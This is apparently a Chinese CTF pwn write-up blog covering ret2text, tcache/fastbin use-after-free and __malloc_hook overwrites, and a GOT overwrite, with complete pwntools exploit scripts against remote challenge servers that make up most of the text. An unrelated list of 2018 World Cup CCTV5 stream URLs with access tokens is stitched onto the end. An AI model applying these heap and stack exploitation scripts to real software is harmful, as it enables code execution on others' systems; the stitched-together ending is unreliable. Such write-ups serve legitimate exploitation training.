简单的ret2text

Problem: [SWPUCTF 2022 新生赛]FindanotherWay

思路

有后门函数0x401230
输入函数vuln 调用gets(s) 栈溢出
栈上缓冲区 12 字节，再加 8 字节覆盖 rbp，然后用 p64 写入后门函数地址就行
需要注意的是，直接跳到后门函数会导致栈不对齐，故跳过保存 rbp 的那条指令，用 0x401235 即可 getshell

EXP

  from pwn import *
# Debug-level logging shows every byte exchanged with the target.
context.log_level = 'debug'
elf = ELF("./FindanotherWay")
# libc = ELF('/home/rick/glibc-all-in-one/libs/2.31-0ubuntu9.17_amd64/libc-2.31.so')
p = remote("node5.anna.nssctf.cn",25105)
# p = process("./FindanotherWay")

# Wait for the prompt that precedes the gets() read in vuln (see the notes above).
p.recvuntil(b"Maybe another way?\n")

# 12 bytes of buffer plus 8 bytes of saved rbp, then the return address.
# 0x401235 is the backdoor entry past its prologue (the author's stack-alignment note).
filler = b'a' * (12 + 0x8)
payload = filler + p64(0x401235)
p.send(payload)
# attach(p)
p.interactive()

总结

  • 对该题的考点总结

tcache + malloc_hook

Problem: [HNCTF 2022 WEEK4]ez_uaf

思路

先泄露 libc 地址，然后打 malloc_hook

EXP

一开始不知道大小大于 0x410 的 chunk 可以不进 tcache，
于是用填满 tcache 的方法打。本机可以打通，但不知道为什么远程打不通；看了一下 log，获取到的 libc_base 不对，好像被截断了。

  from pwn import *
# Debug-level logging: every byte sent/received is printed, which is how the
# author diagnosed the bad libc_base described in the text above.
context.log_level = 'debug'
# Remote target; the commented process() line is the local-testing alternative.
p = remote("node5.anna.nssctf.cn",23814)
#p = process("./ez_uaf")
#r = remote(host,port)
e = ELF('./ez_uaf')
# Local copy of the target's libc; only libc.sym["__malloc_hook"] is read from it below.
libc = ELF('/home/rick/glibc-all-in-one/libs/2.27-3ubuntu1.6_amd64/libc-2.27.so')

def new(size,name,content):
    """Menu option 1 (allocate): answer the size, name and content prompts in order."""
    dialogue = (
        (b'Choice: \n', str(1)),
        (b'Size:\n', str(size)),
        (b'Name: \n', name),
        (b'Content:\n', content),
    )
    for prompt, reply in dialogue:
        p.sendafter(prompt, reply)

def free(idx):
    """Menu option 2 (free) on slot idx."""
    option = 2
    p.sendafter(b'Choice: \n', str(option))
    p.sendafter(b'Input your idx:\n', str(idx))

def show(idx):
    """Menu option 3 (show) on slot idx; the caller reads the printed data itself."""
    for prompt, reply in ((b'Choice: \n', str(3)), (b'Input your idx:\n', str(idx))):
        p.sendafter(prompt, reply)


def edit(idx,content):
    """Menu option 4 (edit) on slot idx; content is sent raw, without waiting for a prompt."""
    option, slot = str(4), str(idx)
    p.sendafter(b'Choice: \n', option)
    p.sendafter(b'Input your idx:\n', slot)
    p.send(content)

# Slots 0..7: eight 0x80-byte allocations with identical name/content.
new(0x80,b'qwq',b'a'*0x80)
new(0x80,b'qwq',b'a'*0x80)
new(0x80,b'qwq',b'a'*0x80)
new(0x80,b'qwq',b'a'*0x80)
new(0x80,b'qwq',b'a'*0x80)
new(0x80,b'qwq',b'a'*0x80)
new(0x80,b'qwq',b'a'*0x80)

new(0x80,b'qwq',b'a'*0x80)
# Slot 8: one smaller 0x20-byte allocation (author's label: "fake 8").
new(0x20,b'qwq',b'a'*0x20) # fake 8




# Free slots 0..8 in order.  Everything below depends on the program's bug
# (the challenge name says "uaf"): a freed slot can still be shown and edited.
for i in range(9):
    free(i)

# show() on the freed slot 7 prints its contents; the author reads 7 bytes,
# drops the first and zero-extends the remaining 6 into the value named main_arena.
# NOTE(review): recv(7) returns *up to* 7 bytes, so a short read would silently
# corrupt every address derived from it -- the author reports exactly a
# truncated libc_base against the remote; the reworked script further down
# consumes the line up to "\n" before reading a fixed 6 bytes.
show(7)
main_arena = u64(p.recv(7)[1:].ljust(8,b'\x00'))
log.success("main_arena=>"+hex(main_arena))
# Address the author wants a later allocation to return: a fixed offset below the leak.
fake_fastbin = main_arena - 0x7b
log.success("fake_fastbin=>"+hex(fake_fastbin))
# Slot 9: a 0x60-byte chunk, freed at once and then edited while free (the UAF write)
# so that its first 8 bytes hold fake_fastbin.
new(0x60,b'qwq',b'a'*0x60) #9
free(9)
edit(9,p64(fake_fastbin))

# Slot 10: same-size request; per the author's plan a subsequent same-size
# allocation is served at fake_fastbin (which one depends on the program's
# own allocations per new(), not visible here).
new(0x60,b'qwq',b'a'*0x60) #10


# libc base = leak minus the author's fixed offsets minus __malloc_hook's offset
# in the local 2.27 libc loaded above.
libc_base = main_arena -88 -0x18 - libc.sym["__malloc_hook"]
log.success("libc_base=>"+hex(libc_base))
# Gadget offset hard-coded for that libc build.
one_gadget = libc_base + 0x10a2fc
# 11 bytes of filler, then the gadget address.
payload = b'a'*11 + p64(one_gadget)
# Slot 11: the allocation whose content write is meant to land on the hook.
new(0x60,b'qwq',payload) #11
#attach(p)
# Trigger: start one more allocation (menu 1, size 10) and stop after the size
# prompt -- the author expects this malloc to run the overwritten hook.
p.sendafter(b'Choice: \n',str(1))
p.sendafter(b'Size:\n',str(10))

#edit(0,b'c'*0x80)
p.interactive()

后面换成 0x410 大小、不进 tcache 的 chunk，就可以打通远程了

  from pwn import *
# Debug-level logging: every byte sent/received is printed.
context.log_level = 'debug'
# Remote target; the commented process() line is the local-testing alternative.
p = remote("node5.anna.nssctf.cn",23814)
#p = process("./ez_uaf")
#r = remote(host,port)
e = ELF('./ez_uaf')
# Local copy of the target's libc; only libc.sym["__malloc_hook"] is read from it below.
libc = ELF('/home/rick/glibc-all-in-one/libs/2.27-3ubuntu1.6_amd64/libc-2.27.so')

def new(size,name,content):
    """Menu option 1 (allocate): answer the size, name and content prompts in order."""
    def answer(prompt, reply):
        p.sendafter(prompt, reply)

    answer(b'Choice: \n', str(1))
    answer(b'Size:\n', str(size))
    answer(b'Name: \n', name)
    answer(b'Content:\n', content)

def free(idx):
    """Menu option 2 (free) on slot idx."""
    replies = ((b'Choice: \n', str(2)), (b'Input your idx:\n', str(idx)))
    for prompt, reply in replies:
        p.sendafter(prompt, reply)

def show(idx):
    """Menu option 3 (show) on slot idx; the caller reads the printed data itself."""
    option = 3
    slot = str(idx)
    p.sendafter(b'Choice: \n', str(option))
    p.sendafter(b'Input your idx:\n', slot)


def edit(idx,content):
    """Menu option 4 (edit) on slot idx; content is sent raw, without waiting for a prompt."""
    for prompt, reply in ((b'Choice: \n', str(4)), (b'Input your idx:\n', str(idx))):
        p.sendafter(prompt, reply)
    p.send(content)

# Slot 0: a 0x410-byte request (author's note: a request of 0x410 or more does not go into tcache).
new(0x410,b'qwq',b'a'*0x410) # author: >= 0x410 does not go into tcache
# Slots 1 and 2: two small chunks used later for the free/edit/alloc sequence.
new(0x20,b'qwq',b'a'*0x20)
new(0x30,b'qwq',b'a'*0x30)
# Free slot 0 and show it while freed (the UAF); skip to the end of the line,
# then read exactly 6 bytes and zero-extend them into the value named main_arena.
free(0)
show(0)
p.recvuntil("\n")
main_arena = u64(p.recv(6).ljust(8,b'\x00')) 
# libc base = leak minus the author's fixed offsets minus __malloc_hook's offset in the local 2.27 libc.
libc_base = main_arena - 96 - 0x10 - libc.sym["__malloc_hook"]
log.success("libc_base=>"+hex(libc_base))
# Gadget offset hard-coded for that libc build.
one_gadget = libc_base + 0x10a2fc
# Free slots 1 and 2, then edit slot 1 while it is freed so its first 8 bytes
# point at main_arena-0x7b (the same fake-chunk offset as in the first script).
free(1)
free(2)
edit(1,p64(main_arena-0x7b))
# Two more 0x20 requests; per the author's plan the one labelled #4 is the
# allocation whose content write reaches the hook.
new(0x20,b'qwq',b'a'*0x20)
new(0x20,b'qwq',b'a'*0x20) #4
# 11 bytes of filler, then the gadget address, written through slot 4.
edit(4,b'a'*11+p64(one_gadget))
#attach(p)

# Trigger: start one more allocation (menu 1, size 10) and stop after the size prompt.
p.sendafter(b'Choice: \n',str(1))
p.sendafter(b'Size:\n',str(10))
p.interactive()

总结

tcache 题还是因为了解的特性太少了。

[ZJCTF 2019]EasyHeap

[ZJCTF 2019]EasyHeap

puts(“——————————–”);
puts(“ Easy Heap Creator “);
puts(“——————————–”);
puts(“ 1. Create a Heap “);
puts(“ 2. Edit a Heap “);
puts(“ 3. Delete a Heap “);
puts(“ 4. Exit “);
puts(“——————————–”);
return printf(“Your choice :”);

from pwn import *
context.os='linux'
context.arch='amd64'
# Debug-level logging: every byte sent/received is printed.
context.log_level='debug'
# Local copy of the target binary; only elf.got["free"] and elf.plt["system"] are read below.
elf = ELF("/home/rick/Downloads/easyheap/easyheap")
p = remote("node5.buuoj.cn",29263)
# Local libc matching the target; loaded but not referenced anywhere in this script.
libc = ELF("/home/rick/glibc-all-in-one/libs/2.23-0ubuntu11.3_amd64/libc-2.23.so")
def debug():
    """Attach a debugger to the live target, then block until the user continues."""
    target = p
    attach(target)
    pause()

def alloc(size,content):
    """Menu option 1 (create): wait for each prompt, then reply with a newline-terminated line."""
    dialogue = (
        ("Your choice :", '1'),
        ("Size of Heap : ", str(size)),
        ("Content of heap:", content),
    )
    for prompt, reply in dialogue:
        p.recvuntil(prompt)
        p.sendline(reply)

def edit(idx, size, content):
    """Menu option 2 (edit): send the index, then the size, then the content.

    The size is a separate answer from the content; the exploit below passes
    len(content) for it.
    """
    def reply(prompt, line):
        p.recvuntil(prompt)
        p.sendline(line)

    reply("Your choice :", '2')
    reply("Index :", str(idx))
    reply("Size of Heap : ", str(size))
    reply("Content of heap : ", content)

def free(idx):
    """Menu option 3 (delete) on index idx."""
    option, index = '3', str(idx)
    p.recvuntil("Your choice :")
    p.sendline(option)
    p.recvuntil("Index :")
    p.sendline(index)


# Address of the program's heaparray in .bss (author's value) and a fake chunk
# header placed 0x33 bytes before it.
bss_heaparray = 0x6020E0
using_fake_chunk = bss_heaparray - 0x33
# Three 0x60-byte chunks: indices 0, 1, 2.
alloc(0x60,b"rick")
alloc(0x60,b"rick")
alloc(0x60,b"rick") #2

# Free index 2, then write past index 1 (edit() takes its own size, so the
# 0x78-byte payload overruns 1's 0x60 bytes): '/bin/sh' at the start of 1,
# filler, then a 0x71 size field and using_fake_chunk in 2's fd position.
free(2)
payload = b'/bin/sh\x00' +b'A'*0x60 + p64(0x71) + p64(using_fake_chunk)
edit(1,len(payload),payload)
# First request takes chunk 2 again; the second is meant to be served at
# using_fake_chunk (author's label).  edit(3) below presumably addresses that
# fake chunk, so the program seems to reuse freed indices -- confirm against the binary.
alloc(0x60,b"rick")
alloc(0x60,b"rick") #alloc fake chunk
# Through the fake chunk, overwrite heaparray[0] with free's GOT address:
# 4*8 + 3 = 0x23 bytes of filler is 0x33 minus the 0x10 chunk header.
payload=p64(0)*4+b'A'*0x3+p64(elf.got["free"])

edit(3,len(payload),payload)

# Index 0 now refers to free@GOT, so editing it writes system's PLT address there.
payload = p64(elf.plt["system"])
edit(0,len(payload),payload) # now modify free got
# free(1) therefore calls system() with index 1's data, which starts with '/bin/sh'.
free(1)

p.interactive()

通过修改 bss 段中的 heaparray，使 idx 0 指向 free 的 GOT 表项，然后向其写入 system 的 PLT 地址，随后调用 free 时就会执行它

baby_heap_ctf0

add(0x10)
add(0x10)
add(0x10)
add(0x10) #fastbin
add(0x80) #unsorted_bin
pwndbg> heap
Allocated chunk | PREV_INUSE
Addr: 0x58b22aae7000
Size: 0x290 (with flag bits: 0x291)

Allocated chunk | PREV_INUSE
Addr: 0x58b22aae7290
Size: 0x30 (with flag bits: 0x31)

Allocated chunk | PREV_INUSE
Addr: 0x58b22aae72c0
Size: 0x30 (with flag bits: 0x31)

Allocated chunk | PREV_INUSE
Addr: 0x58b22aae72f0
Size: 0x30 (with flag bits: 0x31)

Allocated chunk | PREV_INUSE
Addr: 0x58b22aae7320
Size: 0x30 (with flag bits: 0x31)

Allocated chunk | PREV_INUSE
Addr: 0x58b22aae7350
Size: 0x90 (with flag bits: 0x91)

Top chunk | PREV_INUSE
Addr: 0x58b22aae73e0
Size: 0x20c20 (with flag bits: 0x20c21)

size 为 0x20 是因为 size 和 prev_size 两个字段占了 0x10

free chunk1 和2

可以看到它们进入 fastbins 了：chunk 2 的 fd 指向 chunk 1，fastbin 是 LIFO（后进先出）

payload = p64(0)*3 + p64(0x21) + p64(0)*3 + p64(0x21)
payload +=p8(80)

从10开始溢出

payload = p64(0)*3：写 chunk 0 的 fd、bk 和 chunk 1 的 prev_size

p64(0x21)：chunk 1 的 size

p64(0)*3：chunk 1 的 fd、bk 和 chunk 2 的 prev_size

p64(0x21)：chunk 2 的 size
payload += p8(80)：此时已经写到 fd 字段，溢出修改其低字节为 80，使其指向 4 号 chunk

0x33 计算

因为头部字段占0x21

需要让第二个字段错位成我们想要的 size（0x70–0x7f）

0x74ab97bc4b0d 数据区从这里开始

0x74ab97bc4b10 这是libc_hook地址

相减等于 3，也就是说我们只需要先写 3 个字节的垃圾数据即可

from pwn import *
context.os='linux'
context.arch='amd64'
# Debug-level logging: every byte sent/received is printed.
context.log_level='debug'
elf = ELF("./babyheap_0ctf_2017")
# This script runs the binary locally (process), unlike the remote() scripts above;
# debug() below attaches to this process.
p = process("./babyheap_0ctf_2017")
# Local libc; only libc.sym["__malloc_hook"] is read from it below.
libc = ELF("/home/rick/glibc-all-in-one/libs/2.23-0ubuntu11.3_amd64/libc-2.23.so")
def debug():
    """Attach a debugger to the local process and pause until the user continues."""
    for step in (attach, pause):
        step(p) if step is attach else step()
def allo(size):
    """Command 1 (allocate) with the given size."""
    steps = (("Command: ", str(1)), ("Size: ", str(size)))
    for prompt, line in steps:
        p.recvuntil(prompt)
        p.sendline(line)

def fill(idx,size,content):
    """Command 2 (fill): write size bytes of content into chunk idx.

    size is sent separately from content; the exploit below passes len(content).
    """
    def reply(prompt, line):
        p.recvuntil(prompt)
        p.sendline(line)

    reply("Command: ", str(2))
    reply("Index: ", str(idx))
    reply("Size: ", str(size))
    reply("Content: ", content)

def free(idx):
    """Command 3 (free) on chunk idx."""
    command, index = str(3), str(idx)
    p.recvuntil("Command: ")
    p.sendline(command)
    p.recvuntil("Index: ")
    p.sendline(index)

def dump(idx):
    """Command 4 (dump) on chunk idx; the caller reads the printed data itself."""
    for prompt, line in (("Command: ", str(4)), ("Index: ", str(idx))):
        p.recvuntil(prompt)
        p.sendline(line)
    

# Four small chunks (0x10 requests -> 0x20 chunks per the heap dump above) and one
# 0x80 request (0x90 chunk) as chunk 4.
allo(0x10)#0
allo(0x10)#1
allo(0x10)#2
allo(0x10)#3
allo(0x80)#4
free(1)
free(2)

# Write from chunk 0 across the headers of chunks 1 and 2, keeping their 0x21
# size fields, and set the low byte of chunk 2's fd to 0x80.
payload = p64(0)*3 + p64(0x21) + p64(0)*3 + p64(0x21)
payload += p8(0x80) # author: makes chunk 2's free-list pointer point at chunk 4, the larger chunk used to obtain the target address
fill(0,len(payload),payload)

# From chunk 3, give chunk 4 a 0x21 size field.
payload = p64(0)*3 + p64(0x21)
fill(3,len(payload),payload) # author: chunk 4's size becomes 0x21, so it is effectively treated as freed

allo(0x10)#1 The original position of 2 # author: request the original chunk 2
allo(0x10)#2 4 Simultaneous pointing	# author: this request lands on chunk 4's position

# Put chunk 4's size back to 0x91 (author: otherwise the top chunk cannot be located).
payload = p64(0)*3 + p64(0x91)
fill(3,len(payload),payload) # author: change chunk 4's size back to 0x91, otherwise the top chunk cannot be found

allo(0x80) # author: request another large chunk so chunk 4 does not merge with the top chunk

free(4)    # author: free chunk 4

# Index 2 aliases chunk 4 (author's note above), so dumping it prints the freed
# chunk's contents; 8 bytes are read and used as the leak.
dump(2)
p.recvuntil('Content: \n')
unsortedbin_addr = u64(p.recv(8).ljust(8,b'\0'))

# Author's fixed offsets: leak -> main_arena -> hook address -> libc base, using
# __malloc_hook's offset from the local 2.23 libc loaded above.
main_arena = unsortedbin_addr - 88
_libc_hook = main_arena - 0x10
local_libc_hook_addr = libc.sym["__malloc_hook"]
_libc_base_addr = _libc_hook - local_libc_hook_addr
# Offset into libc hard-coded by the author for this build.
execve_addr = _libc_base_addr + 0x4527a
fake_chunk_addr = main_arena -0x33 # author: misaligned so the size field reads as the wanted 0x70-0x7f
log.info("main_arena:"+hex(main_arena))
log.info("_libc_base_addr :"+hex(_libc_base_addr))
log.info("_libc_hook :"+hex(_libc_hook))
allo(0x60) # cut chunk -> 0x60 fastbins -> 0x20 unsortbins
free(4)
# Write fake_chunk_addr into index 2's first 8 bytes (its fd while freed).
payload=p64(fake_chunk_addr) #overwrite idx2(0x20,unsortbin)fd
fill(2,len(payload),payload)
allo(0x60) #alloc free(4) chunk 0x60 -> fastbin
allo(0x60) #alloc fake chunk 
# 0x8 + 0x3 + 0x8 bytes of filler, then the target address.
payload=b'a'*(0x8+0x3+0x8) + p64(execve_addr) # author: 0x8 fd, 0x8 bk, 0x3 to undo the misalignment
fill(6,len(payload),payload)
# One more allocation as the trigger, then attach the debugger before going interactive.
allo(0x79)
debug()
p.interactive()

2018年世界杯CCTV5 potplayer直播稳定地址

IPTV(推荐)IPTV(推荐)

rtsp://118.123.56.55:554/PLTV/88888893/224/3221227219/10000100000000060000000001366244_0.smil

CCTV-5-720P(移动源)CCTV-5-720P(移动源)

http://223.110.245.167/ott.js.chinamobile.com/PLTV/3/224/3221226942/index.m3u8

CCTV-5-1080P(北京 移动)CCTV-5-1080P(北京 移动)

http://39.134.52.171/wh7f454c46tw3773685428_-1812949401/hwottcdn.ln.chinamobile.com/PLTV/88888890/224/3221226035/index.m3u8

CCTV-5-1080P(宁夏 电信)CCTV-5-1080P(宁夏 电信)

rtsp://124.224.238.165/PLTV/88888888/224/3221225890/10000100000000060000000000725782_0.smil

CCTV-5-1080P(宁夏 电信)CCTV-5-1080P(宁夏 电信)

rtsp://124.224.238.165:554/PLTV/88888888/224/3221225890/10000100000000060000000000725782_0.smil

CCTV-5-1080P(宁夏 电信)CCTV-5-1080P(宁夏 电信)

http://124.224.238.170/PLTV/88888888/224/3221225890/10000100000000060000000000725782_0.smil

CCTV-5-1080P(中国 教育网)CCTV-5-1080P(中国 教育网)

http://ivi.bupt.edu.cn/hls/cctv5hd.m3u8

CCTV-5-576P(邵阳 联通)CCTV-5-576P(邵阳 联通)

http://hnsyx.chinashadt.com:2036/live/tv17.stream/playlist.m3u8

CCTV-5-1080P(西安 广电网)CCTV-5-1080P(西安 广电网)

http://124.47.33.200/PLTV/88888888/224/3221225489/index.m3u8

CCTV-5-1080P(阳泉 铁通)CCTV-5-1080P(阳泉 铁通)

http://222.37.8.77:13164/playurl?playtype=live&protocol=http&accesstoken=G214BC3E7V11307D1TC05A0AJBD5302ABM7867DF14I9F9DD772&&playtoken=ABCDEFGH&programid=4200000123

CCTV-5-1080P(珠江 宽频/联通)CCTV-5-1080P(珠江 宽频/联通)

http://116.199.5.51:8114/LIVES/index.m3u8?Fsv_otype=1&FvSeid=&Pcontent_id=&Provider_id=&Fsv_chan_hls_se_idx=39

VIUTV-1080P(美国 粤语)VIUTV-1080P(美国 粤语)

http://173.64.66.171:9981/stream/channel/968405a3b3d21b7a95bf7a0da2c161ee?ticket=F61D5B21491408F1B7437C9A856DEB803F87D2F2

CCTV-5-1080P(西安 广电网)CCTV-5-1080P(西安 广电网)

http://124.47.33.211/PLTV/88888888/224/3221225489/index.m3u8

CCTV-5-1080P(江苏 移动)CCTV-5-1080P(江苏 移动)

http://183.207.248.71/cntv/live1/HD-2500k-1080P-cctv5/HD-2500k-1080P-cctv5